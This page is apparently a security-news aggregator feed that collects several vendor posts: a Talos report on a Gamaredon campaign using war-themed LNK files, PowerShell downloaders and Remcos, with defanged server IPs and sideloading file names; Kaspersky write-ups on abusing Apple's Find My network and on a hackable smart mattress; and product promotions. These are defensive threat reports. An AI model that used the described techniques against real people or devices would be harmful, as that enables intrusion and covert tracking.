Welcome to Cisco Talos’ 2024 Year in Review, available for download now. This report is powered by threat telemetry from over 46 million global devices across 193 countries and regions, amounting to more than 886 billion security events per day.
Explore key insights in topics including the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. With Talos’ informed analysis and recommendations, you can strategically prioritize your defenses to stay ahead in 2025.
2024’s Threat Actor Playbook: Stealth and Simplicity
This year, cybercriminals leaned heavily on stealth and efficiency, favoring straightforward techniques over complex malware and zero-day exploits. Here’s more that stood out:
Identity-based attacks were particularly noteworthy, accounting for 60% of Cisco Talos Incident Response cases.
Some of the top-targeted network vulnerabilities affect end-of-life (EOL) devices and therefore have no available patches, despite still being actively targeted by threat actors.
Ransomware actors overwhelmingly leveraged valid accounts for initial access in 2024, with this tactic appearing in almost 70% of cases. They also targeted education entities more than any other sector in 2024, a trend in line with previous years.
Based on Cisco Duo data, identity and access management (IAM) applications were most frequently targeted in MFA attacks, accounting for nearly a quarter of related incidents.
Threat actor use of AI and machine learning largely fell short of industry projections, with actors relying on these technologies to enhance their techniques rather than aid in the creation of new ones.
Want some quick insights? Here’s a two-minute overview of key findings:
Stay informed
Download Talos’ 2024 Year in Review today, and bookmark our landing page to access forthcoming exclusive interviews with Talos experts, videos, podcasts and more.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-31 10:06:462025-03-31 10:06:46Available now: 2024 Year in Review
Cisco Talos is actively tracking an ongoing campaign targeting users in Ukraine with malicious LNK files, which run a PowerShell downloader, since at least November 2024.
The file names use Russian words related to the movement of troops in Ukraine as a lure.
The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to download the second stage Zip file containing the Remcos backdoor.
The second stage payload uses DLL side loading to execute the Remcos payload.
Talos assesses with medium confidence that this activity is associated with the Gamaredon threat actor group.
Phishing campaign using the invasion of Ukraine as a theme
The invasion of Ukraine is a common theme used by the Gamaredon group in their phishing campaigns and this campaign continues the use of this technique. The actor distributes LNK files compressed inside ZIP archives, usually disguising the file as an Office document and using names that are related to the invasion.
Although Talos was not able to pinpoint the exact method by which these files are distributed, it is likely that Gamaredon continues to send phishing e-mails with either the ZIP file directly attached to it or containing a URL link to download the file from a remote host.
Below are some examples of file names used in this campaign:
Coordinates of enemy takeoffs for 8 days (Krasnoarmeysk).xlsx.lnk
Позициипротивниказапад и юго-запад.xlsx.lnk
Positions of the enemy west and southwest.xlsx.lnk
РИБАК СтаніславВікторович.docx.lnk
RYBAK Stanislav Viktorovich.docx.lnk
ШАШИЛО ОлександрВіталійович.docx.lnk
SHASHILO Oleksandr Vitaliyevich.docx.lnk
The translation for these names shows the intent of this campaign in using a war-related theme. We can see some of the files use names of Russian or Ukrainian agents, as well as names alluding to troop movements in the region of conflict.
These files contain metadata indicating only two machines were used in creating the malicious shortcut files. As we mentioned in a previous blog Gamaredon tends to use a short list of machines when creating the LNK files for their campaigns and the ones used in this campaign were previously seen by Talos in incidents related to this threat group.
The LNK files contain PowerShell code used to download and execute the next stage payload, as well as a decoy file which is shown to the user after the infection occurs as a way to disguise the compromise.
The PowerShell code uses the cmdlet Get-Command to indirectly execute the functions to download and execute the payload, which could be an attempt to bypass string-based detection by antivirus solutions.
The servers used in this campaign are based out of Germany and Russia, and at the time of our assessment, all of them return HTTP error 403 when attempting to download the payload files.
That indicates that either the files were taken offline, or access to the file is being restricted. Gamaredon is known to restrict access to their payload servers only to victims located in Ukraine. We have found evidence in public sample databases that these servers were still hosting the files for specific regions while returning access denied errors in our tests, like this sample available in the “Any.run” public sandbox:
The servers used in this campaign are mostly hosted in two Internet Service Providers (ISP): GTHost and HyperHosting:
IP
ASN
ISP
146[.]185[.]233[.]96
63023
gthost
146[.]185[.]233[.]101
63023
gthost
146[.]185[.]239[.]45
63023
gthost
80[.]66[.]79[.]91
60602
hyperhosting
80[.]66[.]79[.]195
60602
hyperhosting
81[.]19[.]131[.]95
63023
ispipoceanllc
80[.]66[.]79[.]159
60602
hyperhosting
80[.]66[.]79[.]200
60602
hyperhosting
80[.]66[.]79[.]155
60602
hyperhosting
146[.]185[.]239[.]51
63023
gthost
146[.]185[.]233[.]90
63023
gthost
146[.]185[.]233[.]97
63023
gthost
146[.]185[.]233[.]98
63023
gthost
146[.]185[.]239[.]47
63023
gthost
146[.]185[.]239[.]56
63023
gthost
146[.]185[.]239[.]33
63023
gthost
146[.]185[.]239[.]60
63023
gthost
These servers are used to distribute the payload and the decoy document, but Talos found evidence of at least one server being used as the Command and Control (C2) server for the Remcos backdoor.
We have also found evidence of an interesting artifact in the DNS resolution for some of these servers. Even though all the communication with these servers is done directly via the IP address, the reverse DNS record for some of these IPs show an invalid entry that is quite unique:
While this doesn’t necessarily mean the attackers manually changed these records, it did help uncover at least two additional IPs matching the characteristics of the other servers in this campaign:
DLL sideloading used to load Remcos backdoor
Gamaredon has previously been known to use custom scripts and tools in their attack chains, but Talos has observed the use of Remcos backdoor as an alternative tool in their campaigns.
Once the ZIP payload is downloaded from the servers, it is extracted to the %TEMP% folder and executed. The binary which is executed is a clean application which in turn loads the malicious DLL via DLL sideloading method. This file is actually a malicious loader which decrypts and executes the final Remcos payload from encrypted files found within the ZIP.
The PowerShell files we observed downloading the ZIP files contain hints of various applications being abused for DLL side loading, and they contain a mix of clean and malicious files:
DefenderUpdate/DPMHelper.exe
DefenderUpdate/DZIPR.exe
DefenderUpdate/IDRBackup.exe
DefenderUpdate/IUService.exe
DefenderUpdate/madHcCtrl.exe
DefenderUpdate/palemoon.exe
Drvx64/Compil32.exe
Drvx64/IsCabView.exe
Drvx64/TiVoDiag.exe
Drvx64/WiseTurbo.exe
SecurityCheck/Mp3tag.exe
SysDrive/AcroBroker.exe
SysDrive/DPMHelper.exe
SysDrive/IsCabView.exe
SysDrive/palemoon.exe
SysDrive/SbieSvc.exe
SysDrive/steamerrorreporter64.exe
SysDrive/TiVoDiag.exe
SysDrive/vmhost.exe
We can see in the previously mentioned sample downloaded by “Any.run” that it contains the clean application TivoDiag.exe, as well as two DLLs. The file “mindclient.dll” is the malicious DLL which is loaded by “TivoDiag.exe” during execution.
The payload binary is a typical Remcos backdoor which is injected into Explorer.exe. It communicates with the C2 server 146[.]185[.]233[.]96 on port 6856:
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort SIDs for this threat:
Snort 2: 64707, 64708
Snort 3: 301171
Indicators of Compromise
IOCs for this threat can be found in our GitHub repository here.
The Globee Awards is an annual competition celebrating companies in various fields, including technology-related businesses, since 2003. This year, the winners were announced on March 13, and ANY.RUN is one of them! We earned silver in the Outstanding Threat Detection and Response category.
Thank You!
It’s a pleasure to share the news with our lovely community and once again express gratitude to everyone who joined us on the adventure to a safer future and better tools for cybersecurity professionals.
A new milestone on this journey was achieved by our flagship product, ANY.RUN Interactive Sandbox. As part of the awards, it was evaluated by a panel consisting of over 1,500 experts from around the world. Based on their scores and detailed reviews, the Sandbox was recognized as one of the best cybersecurity solutions.
The Value We Bring
Among the advantages of our product that especially benefit businesses are highlighted:
Real-time analysis and constant updates: we always keep our users up-do-date on emerging threats and give the opportunity to analyze potentially dangerous files in seconds.
Safety of sensitive data: our private mode allows you to upload any info that must stay confidential. No one but you will have access to it. ANY.RUN fully complies with SOC 2 and GPDR.
Lowering financial risks: with ANY.RUN’s sandbox, SOC specialists can react to threats fast, thus minimizing harmful consequences or avoiding them altogether. As a result, the company budget won’t suffer.
Equip your team with the malware analysis tool to detect threats faster
We work hard to make ANY.RUN Interactive Sandbox a top-notch solution to your malware analysis needs and are happy to see that our efforts were recognized by the award committee.
Cybersecurity at Globee Awards 2025
San Madan, President of the Globee Awards, congratulated us and other winners in our category, noting the importance of fighting cyber threats:
We are excited to celebrate the remarkable achievements of organizations, cybersecurity professionals, and innovators who are influencing the future of cybersecurity. These winners demonstrate resilience, innovation, and a dedication to safeguarding businesses and individuals from the evolving threats in the cyber landscape.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
AirTags are a popular tracking device used by anyone from forgetful key owners to those with malicious intent, such as jealous spouses and car thieves. Using AirTags for spying is simple: a tag is discreetly placed on the target to allow their movements to be conveniently monitored using Apple Find My. We’ve even added protection from AirTag-based tracking to our products for Android.
But a recent study by security researchers has surprisingly found that remote tracking doesn’t even depend on buying an AirTag or ever being physically near the target. If you manage to sneak special malware onto someone’s Windows, Android, or Linux device (like a computer or phone), it could use the device’s Bluetooth to send out a signal that nearby Apple devices would think is coming from an AirTag. Essentially, for Apple devices, the infected phone or computer effectively becomes an oversized AirTag – trackable via the Find My network, which boasts over a billion Apple phones and tablets.
Anatomy of the attack
The attack exploits two features of the Find My technology.
Firstly, this network uses end-to-end encryption – so participants don’t know whose signals they’re relaying. To exchange information, an AirTag and its owner’s phone rely on a pair of cryptographic keys. When a lost AirTag broadcasts its “callsigns” via Bluetooth, Find My network “detectors” (that is, any Apple device with Bluetooth and internet access, regardless of who owns it) simply transmit AirTag’s geolocation data to Apple servers. The data is encrypted with the lost AirTag’s public key.
Then, any device can ask for the encrypted location data from the server. And because it’s encrypted, Apple doesn’t know who the signal belongs to, or which device asked for it. The crucial point here is that one can only decrypt the data and find out both whose AirTag it is and its exact location by having the corresponding private key. Therefore, this data is only useful to the owner of the smartphone paired with this AirTag.
Another feature of Find My is that detectors don’t verify whether the location signal indeed originated with an Apple device. Any devices that support Bluetooth Low Energy (BLE) can broadcast it.
To exploit these features, the researchers came up with the following method:
They install malware on a computer, phone, or some other device running Android, Windows, or Linux, and check the Bluetooth adapter address.
The attackers’ server receives the information and uses powerful video cards to generate a pair of encryption keys specific to the device’s Bluetooth address and compatible with Apple’s Find My
The public key is sent back to the infected device, and the malware then starts transmitting a Bluetooth message that mimics AirTag signals and includes this key.
Any nearby Apple device connected to the internet receives the Bluetooth message and relays it to the Find My
The attackers’ server uses the private key to request the location of the infected device from Find My and decrypt the data.
How well does the tracking work?
The more Apple devices nearby and the slower the victim’s movement, the better the accuracy and speed of the location tracking. In typical urban environments like homes or offices, the location is typically pinpointed within six to seven minutes and with an accuracy of around three meters. Even in extreme situations, such as being on an airplane, tracking can still occur because internet access is now widely available on flights. The researchers obtained 17 geolocation points throughout a 90-minute flight, allowing them to reconstruct the aircraft’s flight path quite accurately.
Naturally, the success of the attack hinges on whether the victim can be infected with malware, and the details are slightly different depending on the platform. On Linux devices, the attack only requires infecting the victim’s gadget due to the specific Bluetooth implementation. By contrast, Android and Windows employ Bluetooth address randomization, meaning the attacker needs to infect two nearby Bluetooth devices: one as the tracking target (the one that mimics an AirTag), and another to obtain its adapter address.
The malicious application needs Bluetooth access, but this isn’t hard to get. Many common app categories – like media players, file sharing tools, and even payment apps – often have legitimate reasons to request it. It’s likely that a convincing and functional bait application will be created for this type of attack, or even that an existing application will be trojanized. The attack requires neither administrative permissions nor root access.
Importantly, we’re not just talking about phones and computers: the attack is effective across a range of devices – including smart TVs, virtual-reality glasses, and other household appliances – as Android and Linux are common operating systems in many of them.
Another key part of the attack involves calculating cryptographic keys on the server. Due to the complexity of this operation – which requires leasing hardware with modern video cards – the cost of generating a key for a single victim is estimated at around $2.2. For this reason, we find mass-tracking scenarios that target, say, visitors inside a shopping center, to be unlikely. However, targeted attacks at this price point are accessible to virtually anyone, including scammers or nosy co-workers and spouses.
Apple’s response
The company patched the Find My network vulnerability in December 2024 in iOS 18.2, visionOS 2.2, iPadOS 17.7.3 (for older devices) and 18.2 (for newer ones), watchOS 11.2, tvOS 18.2, macOS Ventura 13.7.2, macOS Sonoma 14.7.2, and macOS Sequoia 15.2. Unfortunately, as is often the case with Apple, the details of the updates have not been disclosed. The researchers emphasize that this tracking method will remain technically feasible until all Apple users update to at least the above versions, though fewer devices will be able to report a tracked device’s location. And it’s not impossible that the Apple patch could be defeated by another engineering trick.
How to protect yourself from the attack
Turn off Bluetooth when you’re not using it if your device has the option.
When installing apps, stick to trusted sources only. Verify that the app has been around for a long time, and has many downloads and a high rating in its latest version.
Only grant Bluetooth and location access to apps if you’re certain you need those features.
Regularly update your device: both the OS and main apps.
Make sure you have comprehensive malware protection enabled on all your devices. We recommend Kaspersky Premium.
Besides this rather unusual and as-yet-unseen-in-the-wild tracking method, there are numerous other ways your location and activities can be tracked. What methods are being used to spy on you? Read these for the details:
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-28 09:08:292025-03-28 09:08:29Protecting Android, Windows, and Linux devices against being tracked via the Find My network | Kaspersky official blog
Welcome to this week’s edition of the Threat Source newsletter.
Howdy friends! One of things I learned early on in cyber security is that crime does, in fact, pay. It can pay very well, actually. If it didn’t, we wouldn’t have ransomware cartels raking in obscene amounts of money year after year. Ransomware victims pay ransoms with cryptocurrency — typically Bitcoin. A criminal who has their ill-gotten BTC gains then needs to introduce it into a banking system that lets them spend that crypto currency with no questions asked.
You might be unsurprised to learn that that isn’t as easy as it sounds, but it’s also not a new problem. In the 1980s, South American drug cartels had a similar issue. They were making obscene amounts of money and had massive piles of cash. However, one cannot show up and start dropping massive amounts of money buying very expensive things without drawing legal attention. Plus, it turns out, cash was the preferred way to bribe corrupt officials. As a result, they found legal and banking loopholes, and less than reputable financial practices in the U.S and in other countries to inject ill-gotten money into a legitimate banking system where they could access the funds.
This is called money laundering, and it is at the heart of every successful organized crime organization. Money Laundering 101 is done in three basic steps: Placement, Layering, and Integration.
Placement: You need to get your money into the financial system(s).
Layering: You need to move the money around so it’s harder to trace and to link it to the crime.
Integration: Now that the connection to the crime is obfuscated, you can spend that money. You can invest it, buy expensive cars, or whatever. That money is now in someone else’s pocket. I used to joke that Ferrari dealerships don’t exactly accept cryptocurrency, but it turns out that joke is now on me. More and more businesses now accept cryptocurrency as a direct means of payment it seems.
We often think of the crime of ransomware attacks at the point of impact and victimization, but rarely do we think of the reverse — the money that is paid out that flows back into the cartel and its affiliates. Cryptocurrency is fantastic for money laundering. It lags far behind regulatory standards, is largely anonymous, and can be “mixed” and directed to decentralized exchanges where Know Your Customer (KYC) and Anti-Money Laundering (AML) controls are not applied.
So why am I bringing this up? Well, law enforcement attacking money laundering infrastructure really works. If you can impact how criminals launder their money, you put the brakes on the crime itself happening. After all, what good are the spoils of crime If you can’t do anything with it?
My fear is that regulatory climates have shifted, which will allow laundering to more easily happen. Time will tell if I’m right, and I don’t want to be.
The one big thing
I’m a huge fanboy for clever evasion tactics. Cascading Style Sheets (CSS) evasion tactics in spam emails is just a wicked cool trick. Game knows game, and I have to say, this is super smart. Spam filters play a constant cat and mouse game against adversaries. It goes to show that the threat actors are always innovating neat tricks to exploit victims.
Why do I care?
Spam emails account for a massive threat footprint, especially in enterprise email security. Any attack that sneaks malicious spam emails through a spam filter is worth paying attention to.
So now what?
Knowing is half the battle. Time to look at your email defenses and shore them up. Consider an email proxy service or something similar to help augment your email threat defense.
Top security headlines of the week
Airport outages: Malaysia PM says country rejected $10 million ransom demand (The Record)
Satellites! I am an absolute sucker for space hacking. ENISA released a great guide on securing commercial space assets. (ENISA)
One-click phishing attacks: Google hastily patched a Chrome zero-day vulnerability exploited by an APT. (Dark Reading)
Can’t get enough Talos?
Patch Tuesday was a doozy this time. Check out our blog post here.
Also, keep your eyes peeled: Talos’ 2024 Year in Review will be available for download on Monday, Mar. 31.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-27 18:07:492025-03-27 18:07:49Money Laundering 101, and why Joe is worried
It’s a rare company these days that doesn’t boast about using artificial intelligence (AI). And often no explanation is forthcoming as to why AI is needed or, more importantly, how it’s implemented — just the mere presence of AI, it seems, is enough to make a product more valuable, innovative and high-tech. Kaspersky advocates a different approach: we don’t just say “we use AI”, but explain exactly how we deploy machine learning (ML) and AI technologies in our solutions. It’d take too long to list all our AI technologies in a single post given that we have an entire expertise center — Kaspersky AI Technology Research — that deals with all aspects of AI. So my sole focus here will be on those technologies that make life easier for SIEM analysts working with the Kaspersky Unified Monitoring and Analysis Platform.
SIEM AI Asset Risk Scoring
In traditional systems, one of the most resource-intensive tasks of the SIEM analyst is prioritizing alerts — especially if the system has just been installed and works out of the box with default correlation rules not yet fine-tuned to the infrastructure of a specific company. Big data analytics and AI systems can help here. Armed with SIEM AI Asset Risk Scoring, monitoring and response teams can prioritize alerts and prevent potential damage. The module assesses asset risks by analyzing historical data and prioritizing incoming alerts, allowing to speed up triage and generate hypotheses that can be used for proactive searches.
Based on information about activated correlation rule chains, SIEM AI Asset Risk Scoring lets you build patterns of normal activity on endpoints. Then, by comparing daily activity with these patterns, the module identifies anomalies (for example, sudden traffic spikes or multiple service requests) that may signal a real incident and prompt the analyst to take a deeper look into these alerts. This way, the problem is detected early, before any damage is done.
AI-Powered OSINT IoCs
Analysts working with the Kaspersky Unified Monitoring and Analysis Platform also have the option to use additional contextual information from open sources through the Kaspersky Threat Intelligence Portal. After the latest update, the portal now provides access to threat intelligence collected using a generative AI model.
It works as follows: let’s say you’ve found a suspicious file during a threat hunt. You can take this file’s hash and look it up on the site, and if someone else has already encountered it during an incident investigation and published something about it, the technology will instantly show you indicators of compromise (IoC) and key facts about the threat. Without such an automation system, it can take the analyst many hours to find and review this information — especially if there are lots of materials and they’re written in different languages. Our system, built on an internal LLM model, can automate this process: it analyzes all reports and mentions of the threat whatever the language, extracts the essence, and presents a summary: the nature of the threat, the date it was detected first, cybercriminal groups associated with it, industries most often targeted using the file, and so on. This saves the analyst an enormous amount of time on searching and researching.
What’s more, the analyst has access to other Kaspersky Threat Intelligence data, including information generated using AI technologies and big data analytics. Our threat intelligence databases are continuously updated with the results of manual APT research, live data from the darknet, information from the Kaspersky Security Network, and regular analysis of new malware. All of these technologies help users minimize the potential damage from cyber-incidents and reduce the Mean Time to Respond (MTTR) and the Mean Time to Detect (MTTD).
We continue to improve the usability and performance of our SIEM system, with a focus on deploying AI to free information security employees from even more routine tasks. Follow updates of the Kaspersky Unified Monitoring and Analysis Platform on the official product page.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-27 17:06:382025-03-27 17:06:38AI technologies in Kaspersky SIEM | Kaspersky official blog
Cyber threat intelligence is all about data: its collection, exploration and research, extracting actionable insight. If you employ any intelligence solution, it is vital to understand what data sources it relies on and what kind of information they deliver.
In ANY.RUN’s Threat Intelligence Lookup and TI Feeds, we leverage fresh data from millions of sandbox analyses performed by thousands of organizations and hundreds of thousands of researchers.
Here is how it works.
Where Threat Intelligence Comes From
TI Lookup lets you accessfreshthreat intelligence on active malware and phishing attacks
Over 500,000 security professionals worldwide, including SOC teams from 15,000 companies, use ANY.RUN’s Interactive Sandbox daily to analyze suspicious links and files related to the latest cyber attacks. They check alleged phishing emails, explore potential breach attempts, investigate incidents, and collect critical insights into malicious behavior.
Thanks to ANY.RUN’s proprietary technology, we extract IOCs, IOAs, IOBs, and TTPs from the analyzed samples and enrich Threat Intelligence Lookup and TI Feeds with a continuous inflow of threat data which is:
Real and Exclusive: Companies submit files and URLs related to actual attacks on their infrastructure. The data extracted from these submissions is often unique and cannot be found in any other sources.
Up-to-date: The data belongs to recent or ongoing cyber attacks, including active campaigns and emerging malware.
Actionable: SOC teams often submit samples as part of proactive threat hunting or incident response, contributing to a dataset that helps you predict and prevent future attacks.
Fuel your proactive defense with top threat intelligence Get 50 trial requests in ANY.RUN’s TI Lookup
ANY.RUN provides free TI Feeds samples in STIX and MISP
The wealth of data on the latest cyber threats available in Threat Intelligence Lookup and TI Feeds enables organizations like yours to:
Quickly Detect and Prevent Attacks avoiding operational disruption and further damage.
Enhance SOC Efficiency providing teams with access to current and relevant data and enabling them to defend company’s assets and infrastructure proactively.
Boost Mitigation and Response minimizing the cost of incident, financial and reputational losses.
You can investigate, search, and get a direct stream of IOCs, IOAs, and IOBs in your company to strengthen your proactive defenses against ongoing malware and phishing attacks.
Expand threat coverage in your organization Integrate TI Feeds from ANY.RUN
Examples of Unique Threat Intelligence on Active Cyber Attacks
One of the scenarios where threat data from companies serves other companies through the agency of ANY.RUN’s tools is industry-wide malware campaigns. Organizations that were the first to face incidents help others to anticipate and prevent them.
1. Interlock Ransomware Attacks on US Healthcare
In late 2024, the Interlock ransomware group launched targeted attacks against multiple healthcare facilities in the United States, causing significant disruptions and exposing sensitive patient data.
Threat Intelligence Lookup had data on the threat almost one month before the first reports emerged. This helped our users take preventative measures long before public alerts were raised. For example, one of the malicious domains that distributed the ransomware appeared in submitted samples in September.
The earliest samples with Interlock ransomware found via TI Lookup
Beside gathering IOCs for monitoring, detection and alerts, the security teams were able to see inside sandbox emulations how malicious websites and pages looked like and train employees to recognize and avoid similar threats in the future.
Malicious website opened in the Interactive Sandbox
Finally, ANY.RUN’s data managed to enrich the understanding of attacks and their evolution.
ANY.RUN reports with analysis of Interlock’s fake updater programs
While reports stated that the attackers used malware disguised as a Google Chrome updater, ANY.RUN uncovered additional tactics, such as mimicking MSTeams and MicrosoftEdge updates (evident in filenames like MSTeamsSetup.exe and MicrosoftEdgeSetup.exe).
Learn to Track Emerging Cyber Threats
Check out expert guide to collecting intelligence on emerging threats with TI Lookup
Read full guide
2. Nitrogen Ransomware Attacks on Fintech
Financial services have been one of cybercriminals’ most targeted sectors in recent years. The case with the Nitrogen ransomware group is pretty much similar to that with Interlock in healthcare. Thanks to thousands of companies using ANY.RUN, the information on the new threat appeared quickly in our services, and more companies had the opportunity to protect themselves, set up detection and alerts.
The group was first reported about half a year ago, months after the attack unfolded, and the information about it is still scarce. The more valuable is this data from Threat Intelligence Lookup, which allows users to interconnect, contextualize, and further explore it.
For example, the first analytic report on Nitrogen group from StreamScan mentions the file truesight.sys in their attack dissection. This is a legitimate driver, one of those that are often abused by malefactors to bypass detection. The StreamScan report, however, does not contain or link to any malware samples and analyses that feature the abuse of this driver.
We can use the following query in TI Lookup to find relevant samples:
TI Lookup contains numerous samples belonging to Nitrogen attacks
We can search for this file via TI Lookup, find dozens of analysis tasks where the driver was spotted, see how the malware behaves, and what IOCs are associated with truesight.sys abuse. And of course we can find other malware with similar mechanics.
Conclusion
Threat Intelligence Lookup and TI Feeds offer a wealth of threat data on the latest cyber attacks. From IOCs, IOAs, IOBs to TTPs, you can easily gain valuable context on any piece of intelligence and get a constant stream of up-to-date indicators directly to your detection systems. With ANY.RUN, you get actionable threat intelligence to help your businesses build strong, scalable, and efficient protection against ongoing and emerging threats.
About ANY.RUN
ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-27 12:06:492025-03-27 12:06:49How We Enrich TI Lookup and Feeds with Fresh Threat Data from 15,000 Organizations
For a while after we wrote about hacking a bicycle, it seemed it couldn’t be beat as the most unlikely hack target ever. However, developers’ imagination seems to know no bounds — and hackers aren’t far behind in their ingenuity…
And so, here’s introducing the internet-connected mattress system — or “Pod” as it’s called — made by the company Eight Sleep, along with several ways it can be hacked as discovered by security researcher Dylan Ayrey.
Smart mattress Pod? What’s that?
Perhaps we should start by explaining what an Eight Sleep Pod is and why someone might want to buy this futuristic piece of tech. The Eight Sleep designers position their product as an “Intelligent Bed Cooling System”. The primary target audience is people with various sleep problems: insomnia, poor sleep quality, snoring, and similar issues that can significantly impact quality of life.
The Pod is made up of a sheet-like “high-tech layer” (“Cover”), and an external unit (“Hub”); optionally there’s also a motorized “Base”. It allows users to adjust the temperature of the bed — heating it up or cooling it down as instructed by the owner. It can do it automatically too — more on this later. There’s a network of tubes with water circulating through them built into it. The external unit connected to this system handles the heating and cooling. The Eight Sleep Pod is divided into two independent zones of a double-bed — each with its own settings. The temperature range is fairly broad: from 12 to 43°C.
At $4699, the Eight Sleep Pod 4 Ultra package is the most expensive version of the system made by the company Source
But wait: there’s more to it! The Pod has several dozen “clinical-grade sensors” that track users’ sleep quality. It also has vibration motors to wake you up, and sensors for ambient temperature and humidity. The ultimate version — the Pod 4 Ultra — comes with a transformable, electronically-controlled bed base.
It goes without saying that the system connects to the internet. It does this via a Wi-Fi receiver in the Hub. Eight Sleep Pods are configured and controlled almost exclusively via an app. We say “almost”, because the latest (and most expensive) generation — Pod 4 — has pressure-sensitive areas on the sides that you can tap to control certain functions.
Autopilot and sleep by subscription
The main software component of an Eight Sleep Pod is the “Autopilot” system, which uses sensors built into the Cover to collect lots of statistics about the quality and quantity of users’ sleep, and generate detailed reports for them. In addition, Autopilot has a number of other interesting options. For example, the system can detect when the user starts snoring and change the geometry of the Base to fix the problem.
Autopilot uses vibration sensors to track snoring, and combats it by adjusting the geometry of the bed base Source
The Pod also has a physical alarm clock that wakes the user by changing the temperature of the bed and turning on vibration. However, the key Autopilot feature (and the one Eight Sleep touts the most) is, well, autopilot mode. What this does is continuously monitor the users’ sleep quality — automatically adjusting the temperature to ensure the deepest and most comfortable sleep possible.
In case you thought this was an Eight Sleep Pod ad, let’s look at this product’s numerous flaws…
To start with, these things are eye-wateringly expensive: retail prices start at $3000, and the top-of-the-line Pod 4 Ultra costs a whopping $4700.
An Autopilot subscription would set you back at least $200 per year — without it, the most exciting features simply won’t work Source
But the outlay doesn’t end there: the user will almost certainly have to pay for a subscription that costs between $200 and $300 per year. In theory, you could choose not to pay it, but without the subscription most of the smart features remain inactive.
Also, like any modern tech company, Eight Sleep constantly collects data about its users. CEO Matteo Franceschetti talks quite openly about this on X:
Eight Sleep has accumulated data on almost a billion hours of their users’ sleep Source
Smart mattress hack No. 1: developer backdoor
Now let’s shift the focus to why this post was written: hacking this smart-mattress system. Dylan Ayrey, a security researcher, decided to look into Eight Sleep’s security — simply out of curiosity, he said, as Dylan is the happy owner of an Eight Sleep Pod, which helps him with his insomnia.
To begin analyzing the Pod’s security, Ayrey needed a copy of its firmware. Security-conscious vendors don’t just give their firmware away, so trying to find a copy often becomes a quest unto itself. Not so with Eight Sleep. The update server lets anyone who follows the link download the firmware for any of the company’s Pod models, no questions asked.
While examining the code, Dylan found a number of noteworthy things, including an API for remote connection via SSH. Given that an Eight Sleep Pod is essentially a computer running Linux (as many other modern devices are), a connection like this allows running arbitrary code remotely on the mattress pad Hub.
The Eight Sleep Pod firmware was found to contain an API for remote access to the smart mattress Source
Judging by the email address associated with the SSH public key found in the firmware code, all (or at least many) Eight Sleep engineers could have remote access to any Pod.
Judging by the email address associated with the SSH public key, every Eight Sleep engineer has remote access to any Pod Source
One could use an SSH connection like this to spy on the Pod’s owner — to find out when they’re sleeping or when they spend the night away from home. It would even be possible to check if there’s one person in bed or two. Having this type of control could also let someone play pranks on the owner by changing the temperature of the Pod, turning the alarm clock on or off, adjusting the geometry of the bed base, and so on.
Nothing like that seems to have happened to Eight Sleep Pod owners yet, but something like it could; theoretical possibilities like this sometimes do materialize. This is what recently happened with Ecovacs robot vacuums: pranksters used vulnerabilities in these devices to harass their owners.
Smart mattress hack No. 2: an AWS key in the firmware
While still looking at the Eight Sleep Pod firmware, Dylan discovered a valid AWS (Amazon Web Services) key in its code — used to continuously upload telemetry to the cloud. Again this is only theoretical, but if the key fell into the wrong hands it could lead to serious violations of user privacy.
(Not the) best practices for programming smart devices: hardcoded AWS key in the firmware accessible to anyone Source
For better or for worse, the full truth about the presence of an Amazon key won’t come out. Dylan notified Eight Sleep, and by the time his research was published the key had already been revoked. However, the mere presence of the key within the firmware, where it was accessible to anyone, was clear evidence that user security and privacy were taken lightly.
Dylan further adds that the key could have, at the very least, been used to cause financial damage to the company by sending a large number of meaningless requests to the AWS cloud.
Smart mattress hack No. 3: jailbreaking with the help of an aquarium chiller
Clearly inspired by his earlier findings, Dylan decided to attempt jailbreaking the Pod — that is, detaching it from Eight Sleep’s cloud services. Dylan took a drastic approach: he disconnected the external unit (with all its smart electronics and internet connectivity).
Detaching an Eight Sleep smart mattress from the cloud using a $150 aquarium chiller Source
